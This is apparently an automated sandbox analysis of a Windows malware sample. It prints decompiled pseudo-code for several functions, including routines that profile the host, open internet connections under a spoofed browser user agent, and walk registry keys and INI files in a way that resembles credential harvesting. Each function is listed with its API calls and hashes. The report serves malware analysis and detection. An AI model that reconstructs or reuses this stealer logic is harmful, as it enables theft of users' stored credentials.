    						_v12 = 0x3030303;
    						_t99 = E004172B6(_t111, _t105);
    					}
    					L11:
    					__eflags = _a8 & 0x00000004;
    					if((_a8 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t99;
    						if(_t99 == 0) {
    							L32:
    							__eflags = _v5 - 1;
    							if(_v5 == 1) {
    								E004119C1( *_t111);
    								 *_t111 =  *_t111 & 0x00000000;
    								__eflags =  *_t111;
    							}
    							L34:
    							return _t99;
    						}
    						__eflags = _a8 & 0x00000008;
    						if((_a8 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							}
    							__eflags = _a8 & 0x00000010;
    							if((_a8 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t99;
    								if(_t99 == 0) {
    									goto L32;
    								}
    								__eflags = _a8 & 0x00000020;
    								if((_a8 & 0x00000020) != 0) {
    									E0040AF25(_t106, _t111, 2);
    									E0040AF25(_t106, _t111, 0x17);
    								}
    								goto L34;
    							}
    							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_a4 = _t62;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								__eflags = 0;
    								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
    								_t106 =  &_v588;
    								_t99 = E00417363(_t62,  &_v588, _t109, 0, _t111, 0x271e);
    							}
    							_a4 = 0x104;
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							} else {
    								_t64 =  &_v588;
    								__imp__GetUserNameExW(2, _t64,  &_a4);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									_t65 = _a4;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = 0;
    										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
    										_t106 =  &_v588;
    										_t99 = E00417363(_t65,  &_v588, _t109, 0, _t111, 0x271f);
    									}
    								}
    								goto L28;
    							}
    						}
    						_t112 =  &_v20;
    						E0041D883(_t112);
    						_push(_t112);
    						_push(0x20000);
    						_push(0x271c);
    						_t100 = 6;
    						_t71 = E004172B6(_a4, _t100);
    						_t99 = _t71;
    						__eflags = _t99;
    						if(_t99 == 0) {
    							_t111 = _a4;
    							goto L32;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v12 = _t71 & 0x0000ffff;
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x271d);
    						_t101 = 2;
    						_t75 = E004172B6(_a4, _t101);
    						_t111 = _a4;
    						_t99 = _t75;
    						goto L20;
    					}
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00411AC3();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x2719);
    					_t102 = 4;
    					_t99 = E004172B6(_t111, _t102);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00411AEB();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271b);
    					_t103 = 4;
    					_t99 = E004172B6(_t111, _t103);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = GetTickCount();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271a);
    					_t104 = 4;
    					_t99 = E004172B6(_t111, _t104);
    					goto L16;
    				}
    				_t92 = E00406619(_t106,  &_v556);
    				_t106 =  &_v552;
    				_t99 = E00417363(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				_t95 = E00406779( &_v552,  &_v64);
    				__eflags = _v64;
    				if(__eflags != 0) {
    					_t106 =  &_v64;
    					_t99 = E00417363(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
    				}
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}
































    APIs
    • GetTickCount.KERNEL32 ref: 0040B0D8
    • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,?,?,00000000), ref: 0040B12B
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,00000000), ref: 0040B16D
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040B1AF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: 15a1e247717c04fccdb6f149d7632e59d9a493815e60f1351d640f8e7abf5aed
    • Instruction ID: 88ee206afabb01ba604ee2e06d395ac39e173a6f6957a00777527390dd7b55bb
    • Opcode Fuzzy Hash: 15a1e247717c04fccdb6f149d7632e59d9a493815e60f1351d640f8e7abf5aed
    • Instruction Fuzzy Hash: 8551F731A452487AD7209B55D859FDE3BB8EF02344F04406ABD44AF2D2DB788A85D7DC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0041D902(void* _a4, WCHAR* _a8) {
    				char _v40;
    				char _v160;
    				char _v680;
    				void* __edi;
    				void* __esi;
    				void** _t11;
    				void* _t13;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    				void* _t30;
    				WCHAR* _t34;
    
    				_t11 =  &_a4;
    				_t28 = 0;
    				__imp__ConvertSidToStringSidW(_a4, _t11);
    				if(_t11 != 0) {
    					_t37 =  &_v160;
    					_t13 = 4;
    					E00419DD3(_t13,  &_v160);
    					_push(_a4);
    					_t34 =  &_v680;
    					_t16 = E004126B4(_t37, 0x104, _t34, _t37);
    					_pop(_t30);
    					if(_t16 > 0) {
    						_t18 = 5;
    						E00419DD3(_t18,  &_v40);
    						_t23 = E00415AE5(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
    						if(_t23 != 0 && _t23 != 0xffffffff) {
    							PathUnquoteSpacesW(_t34);
    							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
    							asm("sbb bl, bl");
    							_t28 = 1;
    						}
    					}
    					LocalFree(_a4);
    				}
    				return _t28;
    			}

















    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041D915
    • LocalFree.KERNEL32(?,.exe,00000000), ref: 0041D99D
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041D97D
    • ExpandEnvironmentStringsW.KERNEL32(?,0041CE32,00000104), ref: 0041D98A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
    • String ID: .exe
    • API String ID: 2200435814-4119554291
    • Opcode ID: 426ed9fe809456546324aa3df8bf0bbaeacf24ec12d67cb4ac33d98e91444d44
    • Instruction ID: 5779027b664e0ec7363753f3d7a6b2cbd4cfa4a6117f579856dec3f00a80381e
    • Opcode Fuzzy Hash: 426ed9fe809456546324aa3df8bf0bbaeacf24ec12d67cb4ac33d98e91444d44
    • Instruction Fuzzy Hash: 7D11C6B2A40114ABDF106B79ED09FCB7BADDF45324F040426F949E71A0D778D984CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041AB48(void* __edx) {
    				void _v108;
    				char _v120;
    				char _v212;
    				long _v216;
    				char _v224;
    				void* __esi;
    				void* _t8;
    				void* _t16;
    
    				_t16 = __edx;
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
    					if(_t8 != 0 && _v216 == 0x4e) {
    						E00406312(0x2937498d,  &_v212, 0);
    						_t8 = E00411A32( &_v224,  &_v120, 0x4c);
    						if(_t8 == 0) {
    							_t8 = E0041A756( &_v120, _t16, 0x423e78, _t8);
    							if(_t8 == 0) {
    								_t8 = E0041A9C1(0x423e78, 0);
    							} else {
    								 *0x422530 =  *0x422530 | 0x00000004;
    							}
    						}
    					}
    				}
    				return _t8;
    			}












    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0041AB55
    • GetThreadDesktop.USER32(00000000), ref: 0041AB5C
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041AB75
      • Part of subcall function 0041A756: TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: N$x>B
    • API String ID: 454308152-2370055029
    • Opcode ID: 201f865a1e8fb0e806ffa824f4e70a37f6a6c1613a9b75376d82c28111129064
    • Instruction ID: ac1a0502af23f950b7c9d81ac66166bd2567602b03e68303f6107b7bb058163e
    • Opcode Fuzzy Hash: 201f865a1e8fb0e806ffa824f4e70a37f6a6c1613a9b75376d82c28111129064
    • Instruction Fuzzy Hash: 8B01D4706093006EE610AB609E46FEB339D5B40718F40452FBB25D21E0EB78E954D65F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413595(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t18;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t18 = 0;
    				do {
    					_t1 = _t18 + 0x422394; // 0x422394
    					_t2 = _t18 + 0x422390; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t18 = _t18 + 8;
    				} while (_t18 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}











    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 004135AC
    • InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 004135CB
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004135E8
    • InternetCloseHandle.WININET(00000000), ref: 004135F4
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0041359D, 004135AB
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 3d4977c91c12fc1b85036e1bf0d7762210b642958b115708095a136a52e5c555
    • Instruction ID: e523c1da5d0168752961d706772e3f57377368c23ca1a1a97ab279cf021e6cce
    • Opcode Fuzzy Hash: 3d4977c91c12fc1b85036e1bf0d7762210b642958b115708095a136a52e5c555
    • Instruction Fuzzy Hash: 6BF096722006107ED6225B725D8CDAB7E6EEBCAB52B04082DF657E5121C6358A50877C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00413A09() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E00411E1F( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}











    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413A1A
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413A2D
    • FreeLibrary.KERNEL32(?), ref: 00413A7F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 2607c35178cd2354c94d34c1be55b4b1ed04ec08e7fc337da61f7c48b806f20b
    • Instruction ID: 74fa1793cde658bee29f72531e51ecb6400d9850638d0d2050f1a3d429e9cb23
    • Opcode Fuzzy Hash: 2607c35178cd2354c94d34c1be55b4b1ed04ec08e7fc337da61f7c48b806f20b
    • Instruction Fuzzy Hash: 0C0125B1940214ABCB10EFE89D845DE7A78AF18341F1005BEA655F3250D6748F848668
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040EADD(char* __ecx, void* __eflags) {
    				int _v8;
    				void* _v12;
    				signed int _v16;
    				char* _v20;
    				intOrPtr _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				char _v60;
    				char _v80;
    				char _v100;
    				char _v120;
    				char _v152;
    				char _v216;
    				char _v284;
    				short _v804;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t70;
    				int _t102;
    				int _t110;
    				int _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t119;
    				intOrPtr _t121;
    				void* _t124;
    				intOrPtr _t127;
    				int _t134;
    				intOrPtr _t136;
    				char* _t138;
    				char* _t141;
    				signed int _t145;
    				void* _t146;
    				void* _t147;
    
    				_t129 = __ecx;
    				_t70 = E00411991(0xc08);
    				_t127 = _t70;
    				_t134 = 0;
    				_v24 = _t127;
    				if(_t127 == 0) {
    					return _t70;
    				} else {
    					E00419DD3(0x83,  &_v216);
    					_t141 =  &_v284;
    					E00419DD3(0x84, _t141);
    					_v48 =  &_v216;
    					_v44 = _t141;
    					E00411A74( &_v36,  &_v36, 0, 8);
    					E00419DD3(0x85,  &_v120);
    					E00419DD3(0x86,  &_v100);
    					E00419DD3(0x87,  &_v60);
    					_t145 =  &_v80;
    					E00419DD3(0x88, _t145);
    					_t12 = _t127 + 0x3fc; // 0x3fc
    					_v20 = _t12;
    					_v16 = 0;
    					do {
    						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
    							goto L22;
    						}
    						_v28 = _t134;
    						_v8 = 0x104;
    						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
    							L21:
    							RegCloseKey(_v12);
    							goto L22;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_t136 = _v24;
    							_v28 = _v28 + 1;
    							_t102 = E00415AE5(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
    							_t145 = _t145 | 0xffffffff;
    							_v8 = _t102;
    							if(_t102 != _t145 && _t102 != 0) {
    								_t137 = _t136 + 0x1fe;
    								_t110 = E00415AE5(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
    								_v8 = _t110;
    								if(_t110 == _t145 || _t110 == 0) {
    									_t114 = E00415AE5(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
    									_v8 = _t114;
    									if(_t114 == _t145 || _t114 == 0) {
    										goto L19;
    									} else {
    										goto L10;
    									}
    								} else {
    									L10:
    									_t115 = _v12;
    									_t129 =  &_v804;
    									_v40 = _t115;
    									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
    										_t117 = _t145;
    									} else {
    										_t145 =  &_v40;
    										_t117 = E00415C0D(_t145,  &_v80, _t116, _v20, 0xff);
    									}
    									_v8 = _t117;
    									if(_t117 != 0xffffffff && _t117 != 0) {
    										_t138 = _v20;
    										if(E0040EA83(_t138) > 0) {
    											_t145 =  &_v152;
    											_t119 = 0x56;
    											E00419DD3(_t119, _t145);
    											_t121 = _v24;
    											_push(_t121);
    											_t129 = _t138;
    											_push(_t129);
    											_push(_t121 + 0x1fe);
    											_t51 = _t129 + 0x1fe; // 0x1fe
    											_t124 = E004126B4(_t145, 0x307, _t51, _t145);
    											_t147 = _t147 + 0x10;
    											if(_t124 > 0) {
    												_t129 =  &_v36;
    												if(E00411DB5(_t124,  &_v36, _v20 + 0x1fe) != 0) {
    													_v32 = _v32 + 1;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    							}
    							L19:
    							_v8 = 0x104;
    						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
    						_t134 = 0;
    						goto L21;
    						L22:
    						_v16 = _v16 + 1;
    					} while (_v16 < 2);
    					E004119C1(_v24);
    					if(_v32 <= _t134) {
    						return E004119C1(_v36);
    					}
    					return E0040C9F4(0x307, _v36, 0xcb);
    				}
    			}










































    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040EB94
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040EBBF
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040ED15
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040ED02
      • Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0040EC5F
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 6625f42b2e4d9c27ca2adf17ae9b3461267292e1ce3be79b9ece2b266292b774
    • Instruction ID: 6686b7a46b6ee8edd53aa28c110ce1cbdbe06f0753941bae5a2adf21f5ba193c
    • Opcode Fuzzy Hash: 6625f42b2e4d9c27ca2adf17ae9b3461267292e1ce3be79b9ece2b266292b774
    • Instruction Fuzzy Hash: F9715971900119ABEF10DBA6CD45AEFBBB8FF48304F14056AB610F3291DA399E85CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040DBA3(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				char _v564;
    				short _v576;
    				short _v588;
    				short _v600;
    				short _v608;
    				WCHAR* _v612;
    				WCHAR* _v616;
    				WCHAR* _v620;
    				WCHAR* _v624;
    				WCHAR* _v628;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t51;
    				WCHAR* _t54;
    				WCHAR* _t56;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t63;
    				long _t67;
    				WCHAR* _t69;
    				long _t77;
    				long _t80;
    				WCHAR* _t82;
    				void* _t83;
    				WCHAR* _t86;
    				WCHAR* _t87;
    				short* _t92;
    				WCHAR* _t93;
    				int _t102;
    				WCHAR* _t107;
    				intOrPtr _t114;
    				signed int _t115;
    				void* _t117;
    
    				_t117 = (_t115 & 0xfffffff8) - 0x26c;
    				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L19:
    					return 1;
    				}
    				_t120 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t107 = E00411991(0x1fffe);
    					_v612 = _t107;
    					__eflags = _t107;
    					if(_t107 == 0) {
    						goto L19;
    					}
    					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
    					__eflags = _t51;
    					if(_t51 == 0) {
    						L18:
    						E004119C1(_t107);
    						goto L19;
    					}
    					_t9 =  &(_t51[0]); // 0x1
    					_t54 = E00412871(_t107, _t9);
    					__eflags = _t54;
    					if(_t54 == 0) {
    						goto L18;
    					}
    					_t56 = E00411991(0xc1c);
    					_v620 = _t56;
    					__eflags = _t56;
    					if(_t56 != 0) {
    						_t11 =  &(_t56[0xff]); // 0x1fe
    						_t92 = _t11;
    						_v624 = _t107;
    						_v616 = _t92;
    						_t57 = 0x5c;
    						_t93 =  &(_t92[0xff]);
    						__eflags = _t93;
    						E00419DD3(_t57,  &_v608);
    						_t59 = 0x5d;
    						E00419DD3(_t59,  &_v588);
    						_t61 = 0x5e;
    						E00419DD3(_t61,  &_v576);
    						_t63 = 0x5f;
    						E00419DD3(_t63,  &_v600);
    						do {
    							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
    							__eflags = _t67;
    							if(_t67 != 0) {
    								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
    								_t25 = _t102 - 1; // -1
    								__eflags = _t25 - 0xfffe;
    								if(_t25 <= 0xfffe) {
    									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
    									__eflags = _t77;
    									if(_t77 != 0) {
    										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
    										__eflags = _t80;
    										if(_t80 != 0) {
    											_t82 = E0040DA96(_v624, _t93);
    											__eflags = _t82;
    											if(_t82 > 0) {
    												_t113 =  &_v564;
    												_t83 = 0x55;
    												E00419DD3(_t83,  &_v564);
    												_push(_t102);
    												_push(_v620);
    												_push(_t93);
    												_push(_v616);
    												_t37 =  &(_t93[0xff]); // 0x1fe
    												_t103 = _t37;
    												_t86 = E004126B4(_t113, 0x311, _t37, _t113);
    												_t117 = _t117 + 0x14;
    												__eflags = _t86;
    												if(_t86 > 0) {
    													_t114 = _a4;
    													_t87 = E00411DB5(_t86, _t114, _t103);
    													__eflags = _t87;
    													if(_t87 != 0) {
    														_t39 = _t114 + 4;
    														 *_t39 =  &(( *(_t114 + 4))[0]);
    														__eflags =  *_t39;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t69 = E004128AD(_v624, 1);
    							_v628 = _t69;
    							__eflags = _t69;
    						} while (_t69 != 0);
    						E004119C1(_v620);
    						_t107 = _v616;
    					}
    					goto L18;
    				} else {
    					E0040DB49(_t120,  &_v524, _a4);
    					goto L19;
    				}
    			}

    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • GetPrivateProfileStringW.KERNEL32 ref: 0040DC0A
    • GetPrivateProfileStringW.KERNEL32 ref: 0040DC9E
    • GetPrivateProfileIntW.KERNEL32 ref: 0040DCBC
    • GetPrivateProfileStringW.KERNEL32 ref: 0040DCE7
    • GetPrivateProfileStringW.KERNEL32 ref: 0040DD03
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: b7ef829bcc7d06c591400c19a3bb38e5629a046d963c91084332f0aed9e04ee1
    • Instruction ID: c94c48782572b3a6706b727aa00e2fa201f39d8a7617c92c457f2ea62ec5c5d4
    • Opcode Fuzzy Hash: b7ef829bcc7d06c591400c19a3bb38e5629a046d963c91084332f0aed9e04ee1
    • Instruction Fuzzy Hash: B851C031504306ABD710AB65DC01FEBBBE8AF44754F04093EFA84E62E1D738D949CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041782A(void* __ecx, signed int __edx, void** __esi, long _a4) {
    				char _v5;
    				void _v16;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* _t29;
    				signed int _t31;
    				int _t38;
    				int _t39;
    				signed int _t41;
    				int _t42;
    				int _t45;
    				intOrPtr _t48;
    				void* _t49;
    				signed int _t53;
    				struct _OVERLAPPED* _t54;
    				void** _t56;
    
    				_t56 = __esi;
    				_t53 = __edx;
    				_t49 = __ecx;
    				_t54 = 0;
    				_v5 = 0;
    				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
    				 *__esi = _t29;
    				if(_t29 != 0xffffffff) {
    					_t31 = E00416CF5(_t49, _t29);
    					_v36 = _t31;
    					_v32 = _t53;
    					if((_t31 & _t53) == 0xffffffff) {
    						L4:
    						CloseHandle( *_t56);
    						 *_t56 =  *_t56 | 0xffffffff;
    					} else {
    						if((_t31 | _t53) == 0) {
    							L18:
    							_t56[2] = _t56[2] | 0xffffffff;
    							_t25 =  &(_t56[3]);
    							 *_t25 = _t56[3] | 0xffffffff;
    							__eflags =  *_t25;
    							_v5 = 1;
    							E00416CA5( *_t56, _t54, _t54, _t54);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t54;
    									if(_a4 == _t54) {
    										goto L18;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L16:
    										_t38 = E00416CA5( *_t56, _v28, _v24, _t54);
    										__eflags = _t38;
    										if(_t38 == 0) {
    											goto L4;
    										} else {
    											_t39 = SetEndOfFile( *_t56);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L4;
    											} else {
    												goto L18;
    											}
    										}
    									} else {
    										_t41 = _v16 ^ _t56[4];
    										asm("adc edi, [ebp-0x14]");
    										_t48 = _t41 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v16 = _t41;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L15:
    											_t54 = 0;
    											__eflags = 0;
    											goto L16;
    										} else {
    											if(__eflags < 0) {
    												L11:
    												__eflags = _t41 - 0xa00000;
    												if(_t41 > 0xa00000) {
    													goto L15;
    												} else {
    													_t42 = E00416CA5( *_t56, _t41, 0, 1);
    													__eflags = _t42;
    													if(_t42 == 0) {
    														goto L4;
    													} else {
    														_v28 = _t48;
    														_v24 = 0;
    														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
    														__eflags = _t45;
    														if(_t45 != 0) {
    															_t54 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L4;
    														}
    													}
    												}
    											} else {
    												__eflags = _t48 - _v36;
    												if(_t48 > _v36) {
    													goto L15;
    												} else {
    													goto L11;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    								goto L18;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				L19:
    				return _v5;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0041784B
      • Part of subcall function 00416CF5: GetFileSizeEx.KERNEL32(bxA,bxA,?,?,?,00417862,00000000), ref: 00416D01
    • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041788C
    • CloseHandle.KERNEL32(?,00000000), ref: 00417898
    • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00417907
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041792D
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
